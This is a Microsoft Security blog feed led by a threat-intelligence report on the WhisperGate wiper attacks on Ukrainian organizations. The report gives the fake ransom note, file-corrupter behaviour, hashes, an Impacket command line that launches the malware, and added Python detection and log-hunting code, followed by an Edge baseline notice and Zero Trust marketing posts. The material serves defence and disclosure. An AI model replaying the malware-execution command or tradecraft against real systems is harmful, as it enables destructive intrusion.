Destructive malware targeting Ukrainian organizations

Microsoft Threat Intelligence Center (MSTIC) has identified evidence of a destructive malware operation targeting multiple organizations in Ukraine. This malware first appeared on victim systems in Ukraine on January 13, 2022. Microsoft is aware of the ongoing geopolitical events in Ukraine and the surrounding region and encourages organizations to use the information in this post to proactively protect against malicious activity.

While our investigation is continuing, MSTIC has not found any notable associations between this observed activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware, which is designed to look like ransomware but lacks any ransom recovery mechanism, is intended to be destructive: it is designed to render targeted devices inoperable rather than to obtain a ransom.

At present and based on Microsoft visibility, our investigation teams have identified the malware on dozens of impacted systems, and that number could grow as our investigation continues. These systems span multiple government, non-profit, and information technology organizations, all based in Ukraine. We do not know the current stage of this attacker's operational cycle or how many other victim organizations may exist in Ukraine or other geographic locations. However, it is unlikely that these impacted systems represent the full scope of impact, as other organizations are also reporting affected systems.

Given the scale of the observed intrusions, MSTIC is not able to assess intent of the identified destructive actions but does believe these actions represent an elevated risk to any government agency, non-profit or enterprise located or with systems in Ukraine. We strongly encourage all organizations to immediately conduct a thorough investigation and to implement defenses using the information provided in this post. MSTIC will update this blog as we have additional information to share.

As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. MSTIC is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor or merged with existing actors.

Observed actor activity

On January 13, Microsoft identified intrusion activity originating from Ukraine that appeared to be possible Master Boot Record (MBR) wiper activity. During our investigation, we found a unique malware capability being used in intrusion attacks against multiple victim organizations in Ukraine.

Stage 1: Overwrite Master Boot Record to display a faked ransom note

The malware resides in various working directories, including C:\PerfLogs, C:\ProgramData, C:\, and C:\temp, and is often named stage1.exe. In the observed intrusions, the malware executes via Impacket, a publicly available capability often used by threat actors for lateral movement and execution.

The two-stage malware overwrites the Master Boot Record (MBR) on victim systems with a ransom note (Stage 1). The MBR is the first sector of a disk; on BIOS-booted systems it holds the boot code that loads the operating system, along with the partition table. The ransom note contains a Bitcoin wallet and Tox ID (a unique account identifier used in the Tox encrypted messaging protocol) that have not been previously observed by MSTIC:

Your hard drive has been corrupted.
In case you want to recover all hard drives
of your organization,
You should pay us $10k via bitcoin wallet
1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via
tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65
with your organization name.
We will contact you to give further instructions.

The overwritten MBR code runs the next time the device is powered down and restarted, an action that is often an initial response to a suspected ransomware attack; instead of loading the operating system, the device displays the note.
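The check below is an added example and is not code from the MSTIC post. It takes the first 512-byte sector of a disk or disk image and reports whether it still has the structure of a legitimate MBR (boot signature and a sane partition table) or carries the distinctive strings of the ransom note quoted above. The post does not describe the byte layout of the overwritten sector, so the "wiped" sample is constructed by dropping the note text into an otherwise empty sector; the partition-table and boot-signature checks are ordinary MBR structure, not anything specific to this malware.

```python
"""Triage of a disk's first sector (the MBR) for the DEV-0586 fake ransom note.

Added example, not from the MSTIC post. Only the note strings are taken from the
post; the sector layout used for the wiped sample is an assumption.
"""
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446
BOOT_SIGNATURE = b"\x55\xAA"

# Strings taken verbatim from the ransom note quoted in the post.
NOTE_MARKERS = (
    b"Your hard drive has been corrupted",
    b"1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv",
    b"8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65",
)


def partition_entries(sector: bytes):
    """Yield (status, type, lba_start, sector_count) for the four classic MBR slots."""
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        # status, 3-byte CHS start, type, 3-byte CHS end, LBA start, sector count
        yield struct.unpack_from("<B3xB3xII", sector, off)


def classify_sector0(sector: bytes) -> dict:
    """Return a verdict plus the raw observations for one 512-byte sector."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    markers = [m.decode() for m in NOTE_MARKERS if m in sector]
    has_signature = sector[510:512] == BOOT_SIGNATURE
    entries = list(partition_entries(sector))
    # A sane table: every status byte is 0x00 (inactive) or 0x80 (bootable) and
    # at least one entry describes a non-empty partition.
    sane_table = all(e[0] in (0x00, 0x80) for e in entries) and any(
        e[1] != 0 and e[3] != 0 for e in entries
    )
    if markers:
        verdict = "wiped-ransom-note"
    elif has_signature and sane_table:
        verdict = "plausible-mbr"
    else:
        verdict = "suspicious"
    return {
        "verdict": verdict,
        "markers": markers,
        "boot_signature": has_signature,
        "partition_table_sane": sane_table,
    }


def read_sector0(path: str) -> bytes:
    r"""Read sector 0 from a raw disk or image, e.g. r"\\.\PhysicalDrive0" on
    Windows (administrator rights required) or a forensic image file."""
    with open(path, "rb") as fh:
        return fh.read(SECTOR_SIZE)


def build_clean_mbr() -> bytes:
    """Constructed sample: empty boot code, one bootable NTFS partition, valid signature."""
    sector = bytearray(SECTOR_SIZE)
    struct.pack_into("<B3xB3xII", sector, PARTITION_TABLE_OFFSET, 0x80, 0x07, 2048, 1_000_000)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


def build_wiped_sector() -> bytes:
    """Constructed sample: note text dropped into the sector (layout is an assumption)."""
    note = (
        b"Your hard drive has been corrupted.\r\n"
        b"You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv\r\n"
        b"and send message via tox ID "
        b"8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65\r\n"
    )
    sector = bytearray(SECTOR_SIZE)
    sector[0:len(note)] = note
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


if __name__ == "__main__":
    for name, s in (("clean", build_clean_mbr()), ("wiped", build_wiped_sector())):
        print(name, classify_sector0(s))
```

On a UEFI system with a GPT disk, sector 0 still carries a protective MBR (a single partition entry of type 0xEE), which the plausibility check accepts, so a "plausible-mbr" result on such a machine is expected. Treat "suspicious" as a prompt for a closer look rather than a verdict: a sector with an unusual layout is not necessarily wiped, and a sector that was overwritten with different note text would not be caught by the marker strings alone.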

Overwriting the MBR is atypical for cybercriminal ransomware. In reality, the ransom note is a ruse: the malware destroys the MBR and the contents of the files it targets. There are several reasons why this activity is inconsistent with cybercriminal ransomware activity observed by MSTIC, including:

  • Ransomware payloads are typically customized per victim. In this case, the same ransom payload was observed at multiple victims.
  • Virtually all ransomware encrypts the contents of files on the filesystem. The malware in this case overwrites the MBR with no mechanism for recovery. 
  • Explicit payment amounts and cryptocurrency wallet addresses are rarely specified in modern criminal ransom notes, but were specified by DEV-0586. The same Bitcoin wallet address has been observed across all DEV-0586 intrusions and at the time of analysis, the only activity was a small transfer on January 14.
  • It is rare for the communication method to be only a Tox ID, an identifier for use with the Tox encrypted messaging protocol. Typically, there are websites with support forums or multiple methods of contact (including email) to make it easy for the victim to successfully make contact.
  • Most criminal ransom notes include a custom ID that a victim is instructed to send in their communications to the attackers. This is an important part of the process where the custom ID maps on the backend of the ransomware operation to a victim-specific decryption key. The ransom note in this case does not include a custom ID.

Microsoft will continue to monitor DEV-0586 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.

Stage 2: File corrupter malware

Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions:

.3DM .3DS .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD .BZ .BZ2 .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF .DIP .DJVU .SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO .GZ .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX .KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP .ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3 .PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX .PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK .SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM .SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD .VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM .XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP

If a file carries one of the extensions above, the corrupter overwrites the contents of the file with a fixed number of 0xCC bytes (1 MB in total). After overwriting the contents, the corrupter renames each file with a seemingly random four-byte extension. Analysis of this malware is ongoing.
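The scanner below is an added example, not code from the MSTIC post, for triaging a file share or host after a suspected Stage 2 run. It walks a directory tree and flags a file when its leading 1 MiB (or the whole file, if smaller) consists of nothing but 0xCC bytes, and separately reports files whose name ends in a four-character extension that is not one of the targeted extensions. The post says the contents are overwritten with 0xCC bytes "1MB" in total; whether a larger file is truncated to 1 MB or only its first 1 MB is overwritten is not stated, so checking only the leading 1 MiB is an assumption that covers both readings. The sample files are constructed in a temporary directory.

```python
"""Scan a directory tree for files showing the DEV-0586 file corrupter's artifacts.

Added example, not from the MSTIC post. Assumptions: the overwritten region is
the leading 1 MiB of the file, and the random extension is the file's last suffix.
"""
import os
import shutil
import tempfile
from pathlib import Path

FILL_BYTE = 0xCC
FILL_LENGTH = 1024 * 1024  # the post gives the overwritten size as 1 MB
CHUNK = 64 * 1024

# Subset of the extension list quoted in the post; used only by the rename heuristic.
TARGETED_EXTENSIONS = {".docx", ".xlsx", ".pdf", ".sql", ".bak", ".vmdk", ".ps1", ".txt"}


def is_cc_filled(path: Path) -> bool:
    """True when the first FILL_LENGTH bytes (or the whole file) are all 0xCC."""
    remaining = min(path.stat().st_size, FILL_LENGTH)
    if remaining == 0:
        return False
    with path.open("rb") as fh:
        while remaining > 0:
            chunk = fh.read(min(CHUNK, remaining))
            if not chunk or chunk != bytes([FILL_BYTE]) * len(chunk):
                return False
            remaining -= len(chunk)
    return True


def has_random_four_char_extension(path: Path) -> bool:
    """Heuristic only: a four-character last suffix that is not a known document type."""
    ext = path.suffix  # e.g. ".Kx3q"
    return len(ext) == 5 and ext.lower() not in TARGETED_EXTENSIONS


def scan_tree(root: Path):
    """Return (path, cc_filled, odd_extension) for every file that trips either check."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            try:
                filled = is_cc_filled(p)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            odd_ext = has_random_four_char_extension(p)
            if filled or odd_ext:
                findings.append((p, filled, odd_ext))
    return findings


def summarize(root: Path) -> dict:
    """Split findings into high-confidence (content) and weak (extension-only) hits."""
    findings = scan_tree(root)
    return {
        "cc_filled": sorted(f[0].name for f in findings if f[1]),
        "odd_extension_only": sorted(f[0].name for f in findings if f[2] and not f[1]),
    }


def build_sample_tree() -> Path:
    """Constructed sample: an intact document, a corrupted and renamed file, a small
    corrupted file that kept its name, and a benign file with a four-char extension."""
    root = Path(tempfile.mkdtemp(prefix="whispergate_demo_"))
    (root / "intact.docx").write_bytes(b"PK\x03\x04 real document content")
    (root / "budget.xlsx.Kx3q").write_bytes(bytes([FILL_BYTE]) * FILL_LENGTH)
    (root / "notes.txt").write_bytes(bytes([FILL_BYTE]) * 4096)
    (root / "archive.yaml").write_bytes(b"key: value\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        print(summarize(root))
    finally:
        shutil.rmtree(root)
```

The content check is the one to act on; the extension heuristic is deliberately reported separately because ordinary four-character extensions (".yaml" in the sample, ".json", ".html") trip it, and a real sweep should be run against a read-only copy or image rather than the live volume.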

Recommended customer actions

MSTIC and the Microsoft security teams are working to create and implement detections for this activity. To date, Microsoft has implemented protections to detect this malware family as WhisperGate (e.g., DoS:Win32/WhisperGate.A!dha) via Microsoft Defender Antivirus and Microsoft Defender for Endpoint, wherever these are deployed in on-premises and cloud environments. We are continuing the investigation and will share significant updates with affected customers, as well as public and private sector partners, as we get more information. The techniques used by the actor and described in this post can be mitigated by adopting the security considerations provided below:

  • Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
  • Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.
  • Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. NOTE: Microsoft strongly encourages all customers to download and use password-less solutions like Microsoft Authenticator to secure accounts.
  • Enable Controlled folder access (CFA) in Microsoft Defender for Endpoint to prevent MBR/VBR modification.

Indicators of compromise (IOCs)

The following list provides IOCs observed during our investigation. We encourage customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator | Type | Description
a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 | SHA-256 | Hash of destructive malware stage1.exe
dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 | SHA-256 | Hash of stage2.exe
cmd.exe /Q /c start c:\stage1.exe 1> \\127.0.0.1\ADMIN$\__[TIMESTAMP] 2>&1 | Command line | Example Impacket command line showing the execution of the destructive malware. The working directory has varied in observed intrusions.

NOTE: These indicators should not be considered exhaustive for this observed activity.
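The hunt below is an added example and not code from the MSTIC post. It runs a small rule set over process-creation records (Sysmon event 1 or Security event 4688 style, rendered here as constructed key="value" lines): the output redirection into \\127.0.0.1\ADMIN$\__<timestamp> that appears in the IOC command line is the way Impacket's wmiexec-style execution collects command output, so the rule matches that redirection whatever command sits in front of it; the stage1.exe/stage2.exe names and the two SHA-256 hashes from the table are matched separately. The log format and the hosts, timestamps and parent processes in the samples are constructed.

```python
"""Hunt process-creation logs for the Impacket execution pattern from the IOC table.

Added example, not from the MSTIC post. The key="value" record format below is a
constructed stand-in for however your SIEM exports Sysmon/4688 events.
"""
import re

# SHA-256 values from the IOC table.
IOC_HASHES = {
    "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92": "stage1.exe",
    "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78": "stage2.exe",
}

# cmd.exe /Q /c <anything> 1> \\127.0.0.1\ADMIN$\__<number> 2>&1
IMPACKET_REDIRECT = re.compile(
    r"cmd\.exe\s+/Q\s+/c\s+.*?1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__[\d.]+\s+2>&1",
    re.IGNORECASE,
)
STAGE_NAMES = re.compile(r"\bstage[12]\.exe\b", re.IGNORECASE)
SHA256 = re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE)


def parse_line(line: str) -> dict:
    """Parse one key="value" record into a dict (constructed export format)."""
    return {m.group(1): m.group(2) for m in re.finditer(r'(\w+)="([^"]*)"', line)}


def evaluate(record: dict) -> list:
    """Return the list of rule names that fire for one record, in rule order."""
    hits = []
    cmd = record.get("CommandLine", "")
    if IMPACKET_REDIRECT.search(cmd):
        hits.append("impacket-admin$-redirect")
    if STAGE_NAMES.search(cmd) or STAGE_NAMES.search(record.get("Image", "")):
        hits.append("stage-binary-name")
    for h in SHA256.findall(record.get("Hashes", "")):
        if h.lower() in IOC_HASHES:
            hits.append("ioc-hash:" + IOC_HASHES[h.lower()])
    return hits


def hunt(lines):
    """Return (computer, command line, hits) for every record that fires a rule."""
    results = []
    for line in lines:
        rec = parse_line(line)
        hits = evaluate(rec)
        if hits:
            results.append((rec.get("Computer", "?"), rec.get("CommandLine", ""), hits))
    return results


# Constructed sample records: the IOC command line, the resulting stage1.exe process
# with its hash, an unrelated Impacket-style command, and a benign redirect.
SAMPLE_LOG = [
    'Computer="WS01" Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /Q /c start c:\\stage1.exe 1> \\\\127.0.0.1\\ADMIN$\\__1642090312.51 2>&1" ParentImage="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" Hashes=""',
    'Computer="WS01" Image="C:\\stage1.exe" CommandLine="c:\\stage1.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" Hashes="SHA256=A196C6B8FFCB97FFB276D04F354696E2391311DB3841AE16C8C9F56F36A38E92"',
    'Computer="WS02" Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1642090400.02 2>&1" ParentImage="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" Hashes=""',
    'Computer="WS03" Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /c dir C:\\Users > C:\\temp\\listing.txt" ParentImage="C:\\Windows\\explorer.exe" Hashes=""',
]

if __name__ == "__main__":
    for computer, cmd, hits in hunt(SAMPLE_LOG):
        print(computer, hits, cmd)
```

The redirect rule fires on the third record even though no stage binary is involved; that is intended, because the IOC note says the working directory (and by extension the exact command) varies, and the ADMIN$ redirect is the stable part of the tradecraft. Hash matching is the weakest signal here since a rebuilt sample changes it, so a miss on the hash rule says nothing on its own.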

Detections

Microsoft 365 Defender antivirus: DoS:Win32/WhisperGate.A!dha (Microsoft Defender Antivirus and Microsoft Defender for Endpoint; see Recommended customer actions above).

The post Destructive malware targeting Ukrainian organizations appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v97

January 14th, 2022

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 97!

We have reviewed the settings in Microsoft Edge version 97 and updated our guidance with the addition of 1 setting. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the version 97 package from the Security Compliance Toolkit.

Enhance Images


In version 97 we added a setting, "Enhance images enabled", that the baseline recommends disabling for enterprises. This feature sends images from web applications to Microsoft for enhancement (e.g., better color, lighting, and contrast). For additional information on this setting, please see this link.

Microsoft Edge version 97 introduced 15 new computer settings and 15 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.

As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.

Please continue to give us feedback through the Security Baseline Community or this post.


Learn about 4 approaches to comprehensive security that help leaders be fearless

January 13th, 2022

The last 18 months have put unprecedented pressure on organizations to speed up their digital transformation as remote and hybrid work continue to become the new normal. Yet even with all the change and uncertainty, having the right security support system in place means your organization can still move forward confidently to turn your vision into reality. I’ve seen our customers demonstrate this fearlessness every day, and I love learning from them as we stand together against ongoing threats.

According to the Microsoft Zero Trust Adoption report,1 security is the top concern for organizations moving to hybrid work, and it’s the number one reason that security professionals are adopting a Zero Trust approach. According to the report, only 31 percent of organizations that reported being ahead with their Zero Trust implementation were impacted by NOBELIUM, the perpetrators of the SolarWinds attack.2 Compare that to the 75 percent negatively affected by this devastating cyberattack that reported lagging behind in their Zero Trust implementation.

Zero Trust Adoption Report bar chart showcasing the varying levels of Zero Trust adoption across Microsoft Exchange, Zoom Credentials, SolarWinds, Robinhood, Intel, and Fireye.

Figure 1: Negative impacts of cyberattacks in relation to Zero Trust implementation.

Knowing that your organization is protected from such threats, both external and internal, helps build the confidence you need to succeed. Zero Trust is a strategy that will help you get there. At Microsoft Security, we’re embracing the new reality of hybrid work by providing comprehensive security with best-in-breed coverage—driven by AI and simplified for easy management—so you can be fearless in the pursuit of your vision. In this blog, I’ll share some of our customers’ stories and how they’ve empowered their teams to move forward with confidence during this time of unprecedented change.

1. Comprehensive means coverage of your entire environment

Microsoft unifies security, compliance, identity, and management to help you improve productivity and protect your entire digital estate. By providing an end-to-end solution, we’re able to integrate layers of protection across multiple clouds, platforms, endpoints, and devices—Windows, macOS, Linux, iOS, Android, Amazon Web Services (AWS), Workday, Salesforce, and more. This comprehensive approach reduces the risk of data breaches as well as compliance and privacy missteps. Once the user sets the policies, Microsoft solutions provide data governance that can help enact better security.

Flow chart showcasing identities and endpoints as their authentication and compliance requests are intercepted by the Zero Trust Policy for verification before being granted access to Networks and the data/apps/infrastructure they’re composed of.

Figure 2: Microsoft Zero Trust architecture.

More than providing products and services, we collaborate with our customers to understand their environments and build solutions that fit their needs. One such collaboration was with Siemens where they moved from traditional on-premises security to a scalable, flexible solution to fit the company’s complex environment. Having built its reputation for innovation across diverse industries—energy, healthcare, industrial automation, building control systems, and more—research and development continues to play a vital role in the company’s success. For that reason, protecting the company’s staff and intellectual property is always top of mind. And with offices in 200 countries, managing cybersecurity amid a global landscape of shifting compliance and security regulations provides an ongoing challenge.

“There aren’t many vendors on the planet that can create a solution capable of providing consolidated insights into large, complex environments like ours. That’s why we chose Microsoft.”—Thomas Mueller-Lynch, Service Owner Lead, Digital Identity, Siemens.

“The sheer size of Siemens challenges us as to how we provide the best possible security,” explained Peter Stoll, Cybersecurity Officer and Program Lead for Zero Trust at Siemens IT Worldwide. “We like to make sure we get the benefits of emerging technologies.”

When Siemens decided to make the move from on-premises security to a Zero Trust approach, it turned to Microsoft Security. Their IT team implemented a range of security solutions through their Microsoft 365 subscriptions, including Microsoft Azure Active Directory (Azure AD) with Conditional Access as a policy engine, Microsoft Information Protection, Microsoft Defender for Endpoint, Microsoft Defender for Identity, and other solutions—creating a blueprint for ongoing security enhancements. “We chose the best of suite approach with the Microsoft 365 E5 solution,” explained Mueller-Lynch. “Now we have an overview of our environment that helps us react in real-time and defend against attacks proactively.”

2. Comprehensive isn’t just coverage—it’s best-in-breed protection

Today’s organization not only requires security coverage across their threat landscape but also the confidence that comes with knowing that your provider has a proven track record. Microsoft is a leader in five Gartner Magic Quadrants and eight Forrester Wave categories, and we ranked the highest in the MITRE Engenuity® ATT&CK Evaluations. Microsoft was also named a Leader in IDC MarketScape for Modern Endpoint Security. With best-in-breed protection across the Zero Trust security fundamentals shown in Figure 2, Microsoft provides a security safety net that’s not only comprehensive and fully integrated, but durable for the future. Microsoft’s comprehensive solution has innovation at its heart.

Duck Creek Technologies serves the global property and casualty insurance industry by providing cloud-based, software as a service (SaaS) solutions that help insurance carriers operate faster and smarter. When the company’s existing security information and event manager (SIEM) neared the limits of its processing capabilities, Duck Creek needed to upgrade without losing critical data or reducing its ability to detect threats. “Security is a very big part of how we’ve created the relationships we have with our illustrious list of customers,” says John Germain, Vice President and Chief Information Security Officer, Duck Creek Technologies. “I wanted to be sure that the solution we shifted to was best-in-class. Because Microsoft steadily improves its products and solutions to stay ahead of competing offerings, I know we’re in good hands.”

Duck Creek made a quick and painless migration to both Microsoft Defender for Cloud and Microsoft Sentinel. The company also uses Microsoft Endpoint Manager to manage its mobile-device security policies. Combining this functionality, Duck Creek has created single-pane-of-glass visibility for its remote workforce. “We now have incredible visibility across our entire technology stack, all in one place,” says Germain.

3. Integration and AI power Zero Trust security

Like Siemens, the investment platform company eToro found that shifting from on-premises security to a multi-layered Zero Trust approach required it to reassess its infrastructure. As a social investing platform with more than 17 million registered users across more than 100 countries, their IT team has a lot to cover. “When we were operating our traditional third-party antivirus in parallel with our Microsoft solutions, we noticed that Microsoft Defender for Endpoint was acting as our first barrier against attackers. And in 99 percent of incidents, it was the first to detect and act on threats,” says Shay Zakai, Director of Corporate IT, eToro.

That level of protection gave eToro the confidence to remove its third-party antivirus software and rely on Microsoft’s comprehensive, integrated layers for Zero Trust security. That native integration enables Microsoft’s intelligent tools to cut alert volume by 90 percent while automatically remediating up to 97 percent of endpoint attacks. Today, eToro makes ample use of multiple components within Microsoft Defender for Endpoint—threat and vulnerability management, attack surface reduction, endpoint detection and response (EDR), and automatic investigation and remediation—to protect their global operations.

“Microsoft Cloud App Security [Microsoft Defender for Cloud Apps] gives us the ability to analyze and classify information from Google Workspace and our other third-party apps in conjunction with Microsoft’s compliance tools,” Zakai explains. “That level of information gives us the power to restrict activities and enforce regulations as we see fit.”

eToro also integrates Microsoft Intune, a component of Microsoft Endpoint Manager, for their mobile device and mobile application management. By adopting Microsoft’s integrated, AI-driven security, eToro not only automated threat detection and remediation but also increased mobility for employees while reducing their operating costs. “Because of our adoption of Intune and Microsoft Defender for Endpoint, we had virtually no security concerns as we adapted to COVID-19,” says Zakai. “We were more than 90 percent ready to move to a work-from-home model on day one of the crisis.”

4. Simplicity is stronger

Most security professionals agree that security silos bring risks.3 Microsoft enables organizations to simplify and strengthen their security by consolidating up to 50 disparate products—integrating with other tools to streamline investigation and remediation. When MVP Healthcare decided to divest from the numerous redundant security licenses they’d been relying on, it turned to Microsoft Security for a simpler, more easily managed security posture. The company was using roughly 300 different vendor solutions, many of them designed for specialized functions, and Chief Information Officer (CIO) Michael Della Villa wanted to simplify.

After replacing their legacy security solutions with Microsoft Sentinel, Microsoft Defender for Cloud, Azure Firewall, and other Microsoft security solutions, MVP Healthcare’s IT team was freed up to concentrate on crucial tasks that require human attention. “Microsoft offers the cohesive solution we need,” Della Villa says. “We spent so much time trying to maintain the prior system that we weren’t actually using it. Now we easily get very detailed information from Microsoft Sentinel because it’s so well connected across all of our Microsoft solutions. The focus and clarity we’ve gained is a crucial benefit.”

MVP Healthcare also uses Microsoft Defender for Cloud to protect hybrid workloads. “Alerts from Microsoft Defender for Cloud, Microsoft Defender for Cloud Apps, and other solutions are chained together in an actionable way,” adds MVP Healthcare cybersecurity consultant James Greene. “The entire security suite is seamlessly connected. We appreciate that because we can build a comprehensive policy for dealing with security issues in one place.”

As a global leader in technology manufacturing for IoT systems, machine automation, and embedded computing, Advantech found itself the target of a widely publicized ransomware attack in November 2020. The attack was limited to corporate network servers and was quickly mitigated, but it served as a wakeup call. Future threats could affect factory production, delay customer deliveries, lead to theft of sensitive intellectual property, and even result in safety risks.

“We did many proof of concepts (POCs) with many different vendors, but no one met our needs,” says Kevin Lin, IT Manager at Advantech. “We wanted a comprehensive solution to create better efficiency and visibility. We needed security without affecting efficiency on the client side, or requiring specialist installation and configuration by administrators. We decided on Microsoft.”

According to Kevin, Microsoft Security offers a distinct advantage in its holistic approach to services and security. “Other solutions were a little siloed, specialized, and required individual testing—both for the product and support,” he says. “Many didn’t adequately address operational technology (OT) requirements for manufacturing plants, and we recognized that Advantech’s environment called for a comprehensive solution like Microsoft Security, not a collection of solutions.”

Advantech’s security team is now looking to further raise visibility into their IoT and OT risk with agentless, network-layer security provided by Microsoft Defender for IoT—including asset discovery, vulnerability management, and continuous threat monitoring with anomaly detection. “We didn’t have staff dedicated to figuring out our security situation in our manufacturing plants (where IT security isn’t their specialty),” Kevin says. “This attack alerted senior management that they needed to deploy OT security monitoring in our factory networks as well.”

Helping you be fearless

Across the world with organizations of all sizes, from startups to multinational corporations, we see security teams behind the scenes quietly being fearless in achieving their goals. Despite the threats they face daily, these unsung leaders bravely continue the journey of helping their organizations digitally transform. They and you are the reason we want to show up for this important work. By providing not just comprehensive security, but best-in-breed protection with deep intelligence and simplified experiences—Microsoft Security is right there beside you. We want to help you secure everything and be fearless, and turn your vision into reality. To hear from our customers in their own words, visit Customer Stories to learn more. We look forward to our journey together, being fearless, and empowering each other to thrive!

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1Zero Trust Adoption Report, Microsoft Security, Hypothesis Group 2021. July 2021.

2The hunt for NOBELIUM, the most sophisticated nation-state attack in history, John Lambert, Microsoft Security. 10 November 2021.

3Why Security Can’t Live In A Silo, Douglas Albert, Forbes Technology Council, Forbes. 5 October 2020.



Microsoft Zero Trust solutions deliver 92 percent return on investment, says new Forrester study

January 12th, 2022

In the last two years, we’ve seen a staggering increase in the adoption of cloud-based services, remote work solutions, bring your own device (BYOD), and IoT devices as organizations digitally transform themselves to enable a hybrid workforce.1 Zero Trust has become the essential security strategy for successfully preventing data breaches and mitigating risk in today’s complex cybersecurity landscape.

Implementing a Zero Trust security strategy, however, is a significant undertaking that requires in-depth planning, cross-company collaboration, and resources. Organizations need solutions that simplify and accelerate the adoption of Zero Trust by offering flexibility, integration, and a meaningful return on investment.

In the commissioned study The Total Economic Impact™ of Zero Trust solutions from Microsoft, Forrester Consulting reports that adoption of Microsoft solutions to implement a Zero Trust security strategy delivers:

  • A three-year 92 percent return on investment (ROI) with a payback period of fewer than six months.
  • A 50 percent lower chance of a data breach.
  • Numerous efficiency gains of 50 percent or higher across security processes.

Figure: Total Economic Impact of implementing Zero Trust with Microsoft shows 92 percent ROI and $11.6 million NPV.

To better understand the benefits, costs, and risks associated with this investment, Forrester Consulting interviewed eight decision-makers with experience using Microsoft Security solutions to implement a Zero Trust security strategy. These customers were able to improve their security posture, reduce costs, achieve greater business agility, and increase efficiency in managing security. 

Improved security posture 

Data breaches can be incredibly costly as organizations work to recover their environment and brand reputation. Forrester found that by adopting Microsoft security solutions for their Zero Trust strategy, organizations were able to reduce not only the risk of a breach but also the potential for regulatory violations. Customers also reported significant improvements in their security postures since beginning their journeys, a reduction of shadow IT, and increased compliance by meeting various regulatory requirements. 

Data breach risk reduced by half.

